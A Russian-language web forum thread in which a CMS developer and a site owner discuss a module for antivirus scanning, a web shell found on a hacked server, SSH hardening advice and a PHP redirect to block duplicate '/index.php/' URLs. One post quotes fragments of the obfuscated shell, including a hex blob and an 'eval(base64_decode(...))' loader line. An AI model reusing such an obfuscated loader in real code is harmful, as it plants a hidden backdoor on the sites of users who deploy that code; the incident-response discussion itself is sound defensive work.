IPB

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V  < 1 2 3 >  
Ответить в данную темуНачать новую тему
> Модуль Антивируса Guard, Тестируем новый сложный модуль
Dennion
сообщение 28.5.2012, 9:55
Сообщение #21


Администратор
***

Группа: Главные администраторы
Сообщений: 5909
Регистрация: 20.8.2009
Из: Москва
Пользователь №: 1
Версия CMS Free: 3.3



Там нет обновлений.
Перейти в начало страницы
 
+Цитировать сообщение
Worm
сообщение 28.5.2012, 10:49
Сообщение #22


Активный участник
***

Группа: Модератор
Сообщений: 2675
Регистрация: 30.12.2009
Из: Самара
Пользователь №: 213
Версия CMS Free: 34
Создано сайтов: Достаточно много



Эм... а кнопка в настройках зачем? и раньше обновлялся (((=

Последнее обновление сигнатур 07-09-10 12:43
Перейти в начало страницы
 
+Цитировать сообщение
Dennion
сообщение 28.5.2012, 11:01
Сообщение #23


Администратор
***

Группа: Главные администраторы
Сообщений: 5909
Регистрация: 20.8.2009
Из: Москва
Пользователь №: 1
Версия CMS Free: 3.3



Я прикрыл, там нехилая долбешка на сервак с этими проверками.
Перейти в начало страницы
 
+Цитировать сообщение
Worm
сообщение 28.5.2012, 11:38
Сообщение #24


Активный участник
***

Группа: Модератор
Сообщений: 2675
Регистрация: 30.12.2009
Из: Самара
Пользователь №: 213
Версия CMS Free: 34
Создано сайтов: Достаточно много



ясна (=

нашел шелл на сервере... правда зашифрован
Перейти в начало страницы
 
+Цитировать сообщение
Dennion
сообщение 28.5.2012, 11:39
Сообщение #25


Администратор
***

Группа: Главные администраторы
Сообщений: 5909
Регистрация: 20.8.2009
Из: Москва
Пользователь №: 1
Версия CMS Free: 3.3



Как файл называется и первые 5 строк.
Перейти в начало страницы
 
+Цитировать сообщение
Worm
сообщение 28.5.2012, 11:49
Сообщение #26


Активный участник
***

Группа: Модератор
Сообщений: 2675
Регистрация: 30.12.2009
Из: Самара
Пользователь №: 213
Версия CMS Free: 34
Создано сайтов: Достаточно много



styleb.php с датой изменения раньше даты создания и при обращении к нему пароль требовал

ну там в начале походу мусор (файл из 2х строк)

Код
<?php //c35cdf42e69d7c2a7d3c7ba9dad9834a7d22c8d79f8259775b6b665f9a8ed8adc6beb94caa25bcfa
55518ad5202a6b12f8c13704d58c77981cb76d6d613ab1e269a2384733cba7b09e300955541f0347e
f2f1c59723586b13c468417c973409733d3001ccde1dfc23c7600607970e736e5fb3443eb1a5231a2
992a0532b8434c5ac6490a204bbd4506e61ef03ca0a1bdbe1307e68c70366616fe922eb412e800711
64ea2a70f7c6584b3ec970d8b2fd8b1408468d91f34a3aff7259e177b1c66118307ea7028c0e52448
208005d7f8b26fe211c4299c8a7dd4d9a6e3ed01de248fe2c01ca8a4954709ec89d08d813cbab3b1d
cda45e3bd200154016455aad793dcb70e51380175d11406c8ec990373d79a549935dafc58c3861f85
3fa7124323d22e1f97018d46eff4245d473aa0d2c1cbc1b3cd44cb1f156f2d8aa398853776aaa09c1
10ff0eccc7525d2f06e0480c2255756


а потом вот еще
Код
eval(base64_decode("Ly9jMzVjZGY0MmU2OWQ3YzJhN2QzYzdiYTlkYWQ5ODM0YTdkMjJjOGQ3OWY4MjU5Nzc1YjZiNjY1
ZjlhOGVkOGFkYzZiZWI5NGNhYTI1YmNmYTU1NTE4YWQ1MjAyYTZiMTJmOGMxMzcwNGQ1OGM3Nzk4MWNiN
zZkNmQ2MTNhYjFlMjY5YTIzODQ3MzNjYmE3YjA5ZTMwMDk1NTU0MWYwMzQ3ZWYyZjFjNTk3MjM1ODZiMT
NjNDY4NDE3Yzk3MzQwOTczM2QzMDAxY2NkZTFkZmMyM2M3NjAwNjA3OTcwZTczNmU1ZmIzNDQzZWIxYTU
yMzFhMjk5MmEwNTMyYjg0MzRjNWFjNjQ5MGEyMDRiYmQ0NTA2ZTYxZWYwM2NhMGExYmRiZTEzMDdlNjhj
NzAzNjY2MTZmZTkyMmViNDEyZTgwMDcxMTY0ZWEyYTcwZjdjNjU4NGIzZWM5NzBkOGIyZmQ4YjE0MDg0N
jhkOTFmMzRhM2FmZjcyNTllMTc3YjFjNjYxMTgzMDdlYTcwMjhjMGU1MjQ0ODIwODAwNWQ3ZjhiMjZmZT
IxMWM0Mjk5YzhhN2RkNGQ5YTZlM2VkMDFkZTI0OGZlMmMwMWNhOGE0OTU0NzA5ZWM4OWQwOGQ4MTNjYmF
iM2IxZGNkYTQ1ZTNiZDIwMDE1NDAxNjQ1NWF


кстати кому надо, вот эти скриптом можно найти _http://revisium.com/ai/
Перейти в начало страницы
 
+Цитировать сообщение
Dennion
сообщение 28.5.2012, 11:51
Сообщение #27


Администратор
***

Группа: Главные администраторы
Сообщений: 5909
Регистрация: 20.8.2009
Из: Москва
Пользователь №: 1
Версия CMS Free: 3.3



А дата файла какая?
попробуй поиском по логу апача найти строки с эти файлов, найдешь IP далее по IP найди откуда он вошел.
Перейти в начало страницы
 
+Цитировать сообщение
Worm
сообщение 28.5.2012, 12:46
Сообщение #28


Активный участник
***

Группа: Модератор
Сообщений: 2675
Регистрация: 30.12.2009
Из: Самара
Пользователь №: 213
Версия CMS Free: 34
Создано сайтов: Достаточно много



Цитата(Dennion @ 28.5.2012, 13:51) *
А дата файла какая?
попробуй поиском по логу апача найти строки с эти файлов, найдешь IP далее по IP найди откуда он вошел.


да это я сделал. IP китайский

вот такие странные даты

Дата создания 02/05/2012 14:58
Дата модификации 06/03/2011 20:09
Перейти в начало страницы
 
+Цитировать сообщение
Dennion
сообщение 28.5.2012, 12:48
Сообщение #29


Администратор
***

Группа: Главные администраторы
Сообщений: 5909
Регистрация: 20.8.2009
Из: Москва
Пользователь №: 1
Версия CMS Free: 3.3



Как это дата создания больше даты модификации?
Не ну это конечно можно сделать, только нужно из под рута в шел залезть - тогда получается ssh ломанули.
Перейти в начало страницы
 
+Цитировать сообщение
Worm
сообщение 28.5.2012, 13:07
Сообщение #30


Активный участник
***

Группа: Модератор
Сообщений: 2675
Регистрация: 30.12.2009
Из: Самара
Пользователь №: 213
Версия CMS Free: 34
Создано сайтов: Достаточно много



я тоже думаю что не фтп, а ssh взломали. пароли уже везде поменял (((=

Интересно, а удаление этого файла и смена паролей поможет?
Перейти в начало страницы
 
+Цитировать сообщение
Dennion
сообщение 28.5.2012, 14:08
Сообщение #31


Администратор
***

Группа: Главные администраторы
Сообщений: 5909
Регистрация: 20.8.2009
Из: Москва
Пользователь №: 1
Версия CMS Free: 3.3



Смена и привязка ssh к ip поможет. + смени порт ssh на какой нить нестандартный, типа 1027 и т.д.
Перейти в начало страницы
 
+Цитировать сообщение
Dennion
сообщение 28.5.2012, 14:08
Сообщение #32


Администратор
***

Группа: Главные администраторы
Сообщений: 5909
Регистрация: 20.8.2009
Из: Москва
Пользователь №: 1
Версия CMS Free: 3.3



А у тебя надеюсь через php нельзя системные процессы запускать?
Перейти в начало страницы
 
+Цитировать сообщение
Worm
сообщение 29.5.2012, 9:18
Сообщение #33


Активный участник
***

Группа: Модератор
Сообщений: 2675
Регистрация: 30.12.2009
Из: Самара
Пользователь №: 213
Версия CMS Free: 34
Создано сайтов: Достаточно много



Эмм... эт всё дело произошло на горячо "любимом" хостинге hc.ru
При просьбе помочь, они просто отписываются стандартными фразами о том что обратитесь к разработчику CMS или к своему техническому специалисту (они наверно думают, что если хостинг зарегистрирован на физ. лицо, то за ним скрывается штат в 150 сотрудников).
И еще говорят что с их стороны проблем с сайтом не обнаружен ((= ясное дело что уже ничо нет, т.к. я всё почистил.
Перейти в начало страницы
 
+Цитировать сообщение
Dennion
сообщение 29.5.2012, 9:54
Сообщение #34


Администратор
***

Группа: Главные администраторы
Сообщений: 5909
Регистрация: 20.8.2009
Из: Москва
Пользователь №: 1
Версия CMS Free: 3.3



А у меня был случай в поддержке - клиент пишет что у него сайт не работает картинок нет половина файлов нет, потом пишет что все заработало и хостинг прислал месагу что они обнаружили у него шел и сами откатили стали резервную копию базы (месяц назад или коло того). На вопрос что это было и куда пропала месячная работала был получен ответ, что обращайтесь к разработчикам софта ...делайте выводы, сами нашли, по тихому восстановили без спроса и во всем винят разработчиков smile.gif
Пришлось с клиентом создавать пятый том Войны и Мира отчего это произошло и кто тут молодец....
Перейти в начало страницы
 
+Цитировать сообщение
Worm
сообщение 31.5.2012, 13:07
Сообщение #35


Активный участник
***

Группа: Модератор
Сообщений: 2675
Регистрация: 30.12.2009
Из: Самара
Пользователь №: 213
Версия CMS Free: 34
Создано сайтов: Достаточно много



После шелла с дором в индекс полезли вот такие страницы

_http://www.berezka63.ru/index.php/okean_fantaziy.html

Как их убрать?

Phpshopcms 34203
Перейти в начало страницы
 
+Цитировать сообщение
Dennion
сообщение 31.5.2012, 13:50
Сообщение #36


Администратор
***

Группа: Главные администраторы
Сообщений: 5909
Регистрация: 20.8.2009
Из: Москва
Пользователь №: 1
Версия CMS Free: 3.3



Прям такие твои собственные переделанные или ссылки чужие?
а у тебя в .htaccess прописана 404 ошибка?
Перейти в начало страницы
 
+Цитировать сообщение
Worm
сообщение 31.5.2012, 15:17
Сообщение #37


Активный участник
***

Группа: Модератор
Сообщений: 2675
Регистрация: 30.12.2009
Из: Самара
Пользователь №: 213
Версия CMS Free: 34
Создано сайтов: Достаточно много



Нет, страницы мои, только они без стилей и дублируют страницу без /index.php/ .
Сравнил htaaccess с заводским. Один в один.

Забавно, но еще есть вот такие
_http://www.berezka63.ru/index.php/index.php/okean_fantaziy.html
_http://www.berezka63.ru/index.php/index.php/index.php/okean_fantaziy.html
и т.д.
Перейти в начало страницы
 
+Цитировать сообщение
Dennion
сообщение 31.5.2012, 16:39
Сообщение #38


Администратор
***

Группа: Главные администраторы
Сообщений: 5909
Регистрация: 20.8.2009
Из: Москва
Пользователь №: 1
Версия CMS Free: 3.3



Да кто-то хитро балуется, вставь в начале phpshop/inc/autoload.inc.php

Код
// Закрываем от дублей /index.php/index.php
if (strstr($_SERVER['REQUEST_URI'], 'index.php')) {
    header('Location: /error/');
    exit();
}
Перейти в начало страницы
 
+Цитировать сообщение
Worm
сообщение 31.5.2012, 16:50
Сообщение #39


Активный участник
***

Группа: Модератор
Сообщений: 2675
Регистрация: 30.12.2009
Из: Самара
Пользователь №: 213
Версия CMS Free: 34
Создано сайтов: Достаточно много



Ден, спасибо большое!

А где мне могли чтото еще прописать?

UPD
ой... ради интереса попробовал на другом сайте...
_http://iconostas.ru/index.php/Khram-prep-Sofii-Sluckoyj-v-s-Dudutki.html тут 34207
_http://colorofdream.ru/index.php/help.html - тут 34401

Видимо они есть везде, просто в индекс им не попасть, если их не видно
Перейти в начало страницы
 
+Цитировать сообщение
Проектура
сообщение 28.1.2013, 23:15
Сообщение #40


Участник
**

Группа: Пользователи
Сообщений: 19
Регистрация: 28.11.2012
Пользователь №: 3300
Создано сайтов: 1



Здравствуйте!
Сегодня потестил модуль антивируса, работает.
Только отчеты на почту не отправляет как он говорит:
Цитата
* Измененных файлов - 4
* Новых файлов - 3
* Зараженных файлов - 0

Полный отчет и инструкции по дальнейшим действиям
направлены по адресу xxx@ovk-alliance.ru

Или я что-то не так сделал?
Перейти в начало страницы
 
+Цитировать сообщение

3 страниц V  < 1 2 3 >
Ответить в данную темуНачать новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



RSS Текстовая версия Сейчас: 16.9.2019, 23:32